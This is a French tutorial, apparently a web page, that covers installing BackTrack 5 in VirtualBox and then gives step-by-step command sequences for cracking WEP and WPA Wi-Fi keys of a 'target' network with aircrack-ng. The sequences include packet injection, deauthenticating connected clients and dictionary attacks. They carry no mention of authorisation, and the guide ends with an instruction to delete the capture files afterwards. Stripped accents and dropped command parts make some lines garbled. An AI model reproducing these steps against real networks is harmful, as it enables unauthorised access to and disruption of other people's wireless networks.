Compatibilit matrielle avec BackTrack

Pour savoir si votre carte/cl Wifi est compatible avec BackTrack 5, si elle est compatible mode moniteur et injection et comment linstaller si besoin, visiter ce lien : http://wiki.backtrack-fr.net/index.php/Compatibilit%C3%A9_Mat%C3%A9rielle

Installation et configuration de Backtrack 5 sous VirtualBox

I/ Tlchargement
-Tlcharger la dernire version de VirtualBox depuis cette page http://www.virtualbox.org/wiki/Downloads - Tlcharger lISO de Backtrack 5 depuis ce lien http://www.backtrack-linux.org/downloads/ Choisir la version GNOME 64bit de prfrence (le mode de tlchargement importe peu).

II/ Configuration de VirtualBox

- Installer normalement VirtualBox sur votre ordinateur - Lancer VirtualBox et lancer la cration dune nouvelle machine virtuelle avec le bouton Crer

Cliquer sur Suivant Entrer le nom de la machine virtuelle (Backtrack 5, par exemple) Systme dexploitation : Linux Version : Ubuntu (64bit)

- Cliquer sur Suivant - Assigner la machine virtuelle environ 30% de la RAM de votre ordinateur.

- Cliquer sur Suivant - Cocher Disque dur damorage - Slectionner Crer un nouveau disque dur - Cliquer sur Suivant - Cliquer sur Suivant - Slectionner Fichier de taille variable (Cest le meilleur choix si vous ne voulez pas attendre ou que vous tes limits sur votre disque dur) - Cliquer sur Suivant - Faites glisser le curseur pour rgler la taille maximale du disque virtuel (Je conseille 20Go au minimum si vous voulez pouvoir y travailler un minimum) - Cliquer sur Suivant - Cliquer sur Terminer Vous devriez avoir quelque chose qui ressemble ceci :

- Cliquer sur Terminer

Note : Nous travaillerons sur la machine nomme BT5-1

- Cliquer sur Configuration - Aller dans Stockage

- Cliquer sur licne en forme de disque avec un + - Slectionner Ajouter un lecteur CD/DVD

Cliquer sur Choisir un disque Slectionner lISO de Backtrack 5 que vous avez tlcharg Aller dans Affichage Rgler la Mmoire Vido 64Mo minimum Cliquer sur OK

III/Installation de Backtrack 5

- Cliquer sur Dmarrer pour lancer la machine virtuelle - Au tout dbut appuyer sur Entre si la machine nvolue pas - Slectionner BackTrack Text

- Quand une console apparat, taper : root@root:~# stqrtx Note : Il faut normalement taper startx mais le clavier est par dfaut en Qwerty

- Lancer linstallation de BackTrack par licne sur le bureau Attention : Il faut tre conenct internet pour finaliser linstallation - Slectionner la langue (ici Franais), le fuseau horaire (ici, France) - Laisser le clavier sur Option suggre sil est bien configur (on peut tester le clavier dans la zone en bas de la fentre) - Pour ltape 4 ne rien toucher et cliquer sur Suivant - Cliquer sur Installer et patienter le temps de linstallation Note : Il se peut que linstallation reste un peu bloque 99%, cest normal, le systme tlcharge et installe des fichiers depuis internet - Une fois linstallation termine, teindre BackTrack 5 - Aller dans Configuration Stockage

- Dans le menu droulant Contrleur IDE, slectionner lISO de BackTrack 5 et slectionner Supprimer le priphrique - Dmarrer BackTrack 5 (cf fichier Dmarrer BT5) -Ouvrir une console (icne en haut, gauche de System) - Tlchargeons VBox Guest Addon :
root@bt:~# wget http://download.virtualbox.org/virtualbox/4.0.8/VBoxGuestAdditions_4.0.8.iso

- Aller dans Places Computer File System - Crer un nouveau dossier (New Folder) nomm : a - Installons VBox Guest Addon :
root@bt:~# root@bt:~# root@bt:~# root@bt:~# mount o loop VBoxGuestAdditions_4.0.8.iso /a cd /a chmod a+x VBoxLinuxAdditions.run ./VBoxLinuxAdditions.run

- Redmarrer Ca y est, BackTrack 5 est oprationnel sous VirtualBox !

Dmarrer BackTrack 5
Une fois que BackTrack a t install la procdure pour les commandes pour le dmarrage sont les suivantes :
bt login : root password : toor root@bt:~# startx

(le mot de passe ne saffiche pas)

Utiliser un priphrique USB pour Backtrack 5 sous VirtualBox

Il est important de noter quun priphrique connect la machine virtuelle est dconnect de votre propre ordinateur. Prenons lexemple dune cl USB que nous voulons connecter BackTrack, pour y placer une wordlist par exemple. Ce tuto est aussi valable pour une cl USB-Wifi ou une mini antenne Wifi connecte par USB. - Connecter la cl USB votre ordinateur - Lancer VirtualBox et aller dans les Configurations de la machine cible - Aller dans longlet USB - Cliquer sur la prise USB avec un + - Slectionner le priphrique que vous voulez connecter BackTrack (Vrifier quil soit bien coch dans la liste Filtres Priphriques USB) -Lancer BackTrack Si le priphrique nest pas accessible sous Backtrack : - Cliquer sur Priphriques Priphriques USB - Vrifier si ledit priphrique est bien coch - Si ce nest pas le cas, le cliquer

Cracker un rseau Wifi WEP

Ce tutorial ncessite une installation de Backtrack 5 ainsi quune carte/cl Wifi correctement install sous BackTrack 5 et compatible mode moniteur et injection (cf. Compatibilit matrielle). Suivre les instructions suivantes :

Ouvrir une console root@bt:~# airmon-ng Reprer le nom votre carte/cl wifi, ici wlan0, nous allons dmarrer le mode moniteur root@bt:~# airmon-ng start wlan0 Notez que le mode moniteur est activ sous mon0

root@bt:~# airodump-ng mon0 On suit lvolution des rseaux wifi disponibles. Une fois que vous pensez que vous avez tous les rseaux possibles (attendez 5-10s) appuyez sur Ctrl+C pour arrter le processus. Slectionner le BSSID du rseau cible Clique droit Copy Reprer le CHANNEL de la cible (entre 1 et 13)

root@bt:~# airodump-ng w wep c CHANNEL b BSSID mon0 Le texte en vert est remplacer par les informations de la cible

Ouvrir un nouveau terminal root@bt:~# aireplay-ng -1 0 a BSSID mon0

Ouvrir un nouveau terminal root@bt:~# aireplay-ng -3 b BSSID mon0

Ouvrir un nouveau terminal root@bt:~# dir Nous vrifions la presence du fichier wep01.cap root@bt:~# aircrack-ng wep-01.cap Pour lancer cette commande il faut avoir un nombre suffisant de Data (5000-10000) sur le rseau cible, laisser tout tourner jusqu ce que la cl soit trouve (une cl WEP est compose de 10 caractres hexadcimaux de la forme : xx:xx:xx:xx:xx). Slectionner la cible si demand.

Cela peut prendre de 3min 1h, selon le trafic sur le rseau cible. Une fois que vous avez la cl, sauvegardez-l quelque part. Arrter tous les processus et fermer les consoles. Aller dans Places Home Folder Supprimer tous les fichiers nomms wep-01 (quelque soit lextension).

Cracker un rseau Wifi WPA

Ce tutorial ncessite une installation de Backtrack 5 ainsi quune carte/cl Wifi correctement install sous BackTrack 5, compatible mode moniteur et injection (cf. Compatibilit matrielle) et une wordlist/dictionnaire pralablement copi sur le bureau, de prfrence de la langue de la cible (ici Franais). Suivre les instructions suivantes :

Ouvrir une console root@bt:~# airmon-ng Reprer le nom votre carte/cl wifi, ici wlan0, nous allons dmarrer le mode moniteur root@bt:~# airmon-ng start wlan0 Notez que le mode moniteur est activ sous mon0

root@bt:~# airodump-ng mon0 On suit lvolution des rseaux wifi disponibles. Une fois que vous pensez que vous avez tous les rseaux possibles (attendez 5-10s) appuyez sur Ctrl+C pour arrter le processus. Noter le BSSID, le ESSID et le CHANNEL de la cible. Noter aussi la STATION associe au BSSID cible. Attention : Il est ncessaire davoir une STATION connecte pour raliser la suite ! Sinon les deauth seront inefficaces

root@bt:~# airodump-ng c CHANNEL w wpa b BSSID --ivs mon0 Le texte en vert est remplacer par les informations de la cible

Ouvrir un nouveau terminal

Nous allons lancer une dsauthentification la cible afin dobtenir le handshake, relancer cette commande plusieurs fois si ncessaire. Si vous navez toujours pas de handshake, attendez quil y ait un minimum de trafic sur la cible. 3 commandes quivalentes sont alors possibles : root@bt:~# aireplay-ng -0 1 e ESSID mon0 root@bt:~# aireplay-ng -0 1 a BSSID mon0 root@bt:~# aireplay-ng -0 1 a BSSID c STATION mon0 Il est possible de remplacer le 1 par nimporte quel nombre ce qui changera le nombre de dsauthentification (attention 0 envoie des dehaut linfini Ctrl+C pour arrter-).

Une fois le handshake obtenu, vrifions la prsence de wpa-01.ivs root@bt:~# dir Nous allons maintenant laisser faire la wordlist (ou dictionnaire) root@bt:~# -w /root/Desktop/NOMDUDICO wpa-01.ivs Ici le dictionnaire se nomme wpalist.txt (ne pas oublier lextension !) Attendre que le dictionnaire ait trouv la cl Si le dictionnaire que vous avez utilisez na pas t efficace, essayez en un autre, etc Une fois la cl trouve et note, arrter toutes les consoles et les fermer. Aller dans Places Home Folder Supprimer tous les fichiers wpa-01.ivs